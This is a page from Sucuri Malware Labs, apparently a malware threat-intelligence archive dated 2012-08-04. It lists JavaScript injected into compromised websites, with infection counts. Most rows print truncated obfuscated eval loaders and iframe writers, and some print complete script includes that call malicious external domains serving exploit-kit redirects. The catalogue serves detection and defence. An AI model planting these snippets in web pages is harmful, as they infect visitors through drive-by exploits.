Sucuri Malware Labs
Historic malware entries for 2012-08-04Home | Notes | Malware data | Signatures | Tools | About
Archived data: Latest | 2013-05-19 | 2013-05-15 | 2013-05-14 | 2013-05-13 | 2013-05-12 | 2013-05-07 | 2013-05-02 | 2013-05-01 | More daysWe separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.
Hidden iframes
Latest hidden iframes our scanner have identified on compromised web sites.
Conditional redirections
Conditional redirections we have detected (based on user agents or referers).
Encoded javascript
Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.
| # of sites infected | Type | Malware / Domains |
|---|---|---|
| 1094 | javascript | <script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js... |
| 74 | javascript | <script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="143..120..1122..1404..1210..1188..1276..... |
| 57 | javascript | <scriptlanguage=JavaScript>document.write(<iframesrc=http://frankwscrises.in/showads.php?2&seor... |
| 57 | javascript | <script language='JavaScript'>document.write("<"+"if"+"ra"+"me"+" src='http://"+"frankwsc"+"ris... |
| 42 | javascript | <script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="156..130..1200..1443..1188..1521..1308..... |
| 25 | javascript | <script src="http://eighbo02rsbarr.rr.nu/sl.php"></script> |
| 23 | javascript | <script type='text/javascript'>var wow="frb2b2b3ddb1cob1b3tb1pn";c1="lonly"; if(-1==document.co... |
| 16 | javascript | <script type="text/javascript">if (typeof(redef_colors)=="undefined") { var div_colors = new ... |
| 16 | javascript | <script src="http://andsto57cksstar.rr.nu/sl.php"></script> |
| 12 | javascript | <script src=http://achtbanen.org/images/b-one-default.php ></script> |
| 11 | javascript | <script type="text/javascript" src="http://andws.com.br/ti/Check.php"></script> |
| 10 | javascript | <script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf... |
| 10 | javascript | <script src="http://tartis78tscolla.rr.nu/sl.php"></script> |
| 10 | javascript | <script src="http://onlyforstatic.mine.nu/rss.js"></script> |
| 9 | javascript | <script src="http://brown74emphas.rr.nu/sl.php"></script> |
| 9 | javascript | <script language='JavaScript' type='text/javascript'>var postRmbn_width = "700px"; var postRmbn... |
| 8 | javascript | <script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt... |
| 7 | javascript | <script src="http://xinthesidersdown.com/sl.php"></script> |
| 6 | javascript | <script src="http://tartis78tscolla.rr.nu/sl.php?v=1"></script> |
| 5 | javascript | <script type="text/javascript" src="http://aeg.com.br/us/Check.php"></script> |
| 5 | javascript | <script>try{1-prototype;}catch(bsdtwbd){q=412;} if(1){f=[1,0,95,94,23,30,92,102,89,109,100,91,1... |
| 5 | javascript | <script>try{1-prototype;}catch(bsdtwbd){q=412;} if(1){f=[1,0,95,94,23,30,92,102,89,109,100,91,1... |
| 4 | javascript | <script>try{1-prototype;}catch(bsdtwbd){q=412;} if(020==0x10){f=[1,0,95,94,23,30,92,102,89,109,... |
| 3 | javascript | <script type="text/javascript">var vbsp='6CF4890F';eval(function(p,a,c,k,e,d){e=function(c){ret... |
| 3 | javascript | <script>s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a... |
| 3 | javascript | <script src="http://brown74emphas.rr.nu/sl.php?v=1"></script> |
| 2 | javascript | <script type="text/javascript">var vbsp='24D47C6B';eval(function(p,a,c,k,e,d){e=function(c){ret... |
| 2 | javascript | <script type="text/javascript" src="http://eumemo.com.br/010706.php"></script> |
| 2 | javascript | <script>try{n-=eval("p"+"rototype");}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..... |
| 2 | javascript | <script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script> |
| 1 | javascript | <script type="text/javascript">var vbsp='C0D06A5D';eval(function(p,a,c,k,e,d){e=function(c){ret... |
| Limited view (40 rows)... Only the top entries being displayed. |